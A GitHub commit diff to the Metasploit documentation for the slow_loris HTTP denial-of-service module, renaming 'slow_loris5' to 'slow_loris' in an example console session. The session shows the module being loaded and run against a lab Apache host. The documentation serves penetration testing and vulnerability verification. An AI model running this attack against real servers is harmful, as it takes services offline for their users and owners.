Skip to content

Commit aa16288

Browse files
DanielRTeixeiramkienow-r7
authored andcommitted
Update slow_loris.md
1 parent 6d2007a commit aa16288

File tree

1 file changed

+5
-5
lines changed

1 file changed

+5
-5
lines changed

documentation/modules/auxiliary/dos/http/slow_loris.md

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -22,10 +22,10 @@ Vulnerable app versions include:
2222
### Apache/2.2.8 - Ubuntu 8.04
2323

2424
```
25-
msf > use auxiliary/dos/http/slow_loris5
26-
msf auxiliary(slow_loris5) > show options
25+
msf > use auxiliary/dos/http/slow_loris
26+
msf auxiliary(slow_loris) > show options
2727
28-
Module options (auxiliary/dos/http/slow_loris5):
28+
Module options (auxiliary/dos/http/slow_loris):
2929
3030
Name Current Setting Required Description
3131
---- --------------- -------- -----------
@@ -34,9 +34,9 @@ Module options (auxiliary/dos/http/slow_loris5):
3434
RPORT 80 yes The target port (TCP)
3535
THREADS 1000 yes The number of concurrent threads
3636
37-
msf auxiliary(slow_loris5) > set RHOST 192.168.216.129
37+
msf auxiliary(slow_loris) > set RHOST 192.168.216.129
3838
RHOST => 192.168.216.129
39-
msf auxiliary(slow_loris5) > run
39+
msf auxiliary(slow_loris) > run
4040
4141
[*] 192.168.216.129:80 - Executing requests 1 - 1000...
4242

0 commit comments

Comments
 (0)